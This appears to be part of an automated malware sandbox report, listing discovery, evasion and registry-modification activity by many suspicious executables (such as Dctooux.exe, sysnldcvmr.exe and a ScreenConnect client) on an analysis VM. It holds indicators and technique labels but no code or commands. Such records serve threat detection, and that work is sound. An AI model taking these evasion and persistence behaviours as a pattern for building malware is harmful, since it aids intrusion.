N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\Nework.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1487620755.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\axaso\bkujn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\sysnldcvmr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1094014616.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\kxfh9qhs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\szo0xbx8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\tn8cdkzn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\q1wnx5ir.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\program files (x86)\internet explorer\iexplore.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\3188116601.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\s.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\ATLEQQXO.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\systeminfo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\MYNEWRDX.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\864131738.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\3dismhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\vorpgkadeg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\sysnldcvmr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\pfntjejghjsdkr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

System Network Connections Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000f914d34881601a250000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000f914d3480000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900f914d348000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1df914d348000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000f914d34800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe N/A

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
